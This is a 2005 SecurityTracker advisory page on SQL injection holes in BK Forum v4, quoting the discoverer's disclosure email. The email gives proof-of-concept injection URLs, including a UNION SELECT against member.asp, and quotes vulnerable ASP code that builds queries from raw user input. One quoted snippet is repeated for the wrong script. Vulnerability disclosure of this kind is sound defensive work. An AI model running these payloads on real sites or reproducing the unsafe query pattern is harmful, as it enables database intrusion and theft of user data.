Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
BK Forum Input Validation Holes Let Remote Users Inject SQL Commands
|
|
SecurityTracker Alert ID: 1013793 |
|
SecurityTracker URL: http://securitytracker.com/id/1013793
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Apr 25 2005
|
Impact:
Disclosure of system information, Disclosure of user information
|
Exploit Included: Yes
|
Version(s): 4
|
Description:
Diabolic Crab reported an input validation vulnerability in BK Forum. A remote user can inject SQL commands.
Several scripts do not properly validate user-supplied input. A remote user can supply specially crafted parameter values to execute SQL commands on the underlying database.
Some demonstration exploit URLs are provided:
http://[target]/member.asp?id=10%20UNION%20Select%20*%20from%20Member%20where%20memName%20=%20'dc'
http://[target]/forum.asp?forum='SQL INJECTION
Also, the 'register.asp' script does not validate any of the form values.
|
Impact:
A remote user can execute SQL commands on the underlying database.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.bkdev.net/ (Links to External Site)
|
Cause:
Input validation error
|
Underlying OS:
Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Sat, 23 Apr 2005 13:14:25 +0530
Subject: Multiple Sql injection vulnerabilities in BK Forum v.4
|
Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah
Severity: High
Title: Multiple Sql injection vulnerabilities in BK Forum v.4
Date: 23/04/2005
Vendor: BKdev
Vendor Website: http://www.bkdev.net
Summary: There are, multiple sql injection vulnerabilities in bk forum v.4.
Proof of Concept Exploits:
http://forum.bkdev.net/member.asp?id=10%20UNION%20Select%20*%20from%20Member%20where%20memName%20=%20'dc'
[CODE]
id = request.querystring("id")
sql = "select * from Member where memID = " & id
set rs = conn.execute(sql)
[/CODE]
http://forum.bkdev.net/forum.asp?forum='SQL INJECTION
[CODE]
id = request.querystring("id")
sql = "select * from Member where memID = " & id
set rs = conn.execute(sql)
[/CODE]
http://forum.bkdev.net/register.asp
All the form values are vulnerable to sql injection
[CODE]
sql = "insert into Member (memName, memPassword, memFirstName, memLastName, memEmail, memHomepage, " & _
"memDate, memLevel, memSignature, memPic, memAbout, memAcceptNotification, memShowAvatar,
memLoggedOn, " & _
"memLastActive) values ('" & memname & "', '" & mempw & "', '" & firstname & "', '" & lastname & "', " & _
"'" & email & "', '" & homepage & "', #" & now & "#, " & LEVEL_MEMBER & ", '" & signature & "', " & _
"'" & picture & "', '" & about & "', " & notify & ", " & avatar & ", " & false & ", #" & now & "#)"
[/CODE]
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
Author:
These vulnerabilties have been found and released by Diabolic Crab, Email:
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding
these vulnerabilities. You can find me at, http://www.hackerscenter.com or
http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding with
php.
Sincerely,
Diabolic Crab
Web Security, Research & Development
dP Security
email: dcrab@digitalparadox.org
website: http://www.digitalparadox.org
This message is confidential. It may also contain information that is
privileged or otherwise legally exempt from disclosure.
If you have received it by mistake please let us know by e-mail
immediately and delete it from your system; should also not copy
the message nor disclose its contents to anyone. Many thanks.
|
|
Go to the Top of This SecurityTracker Archive Page
|
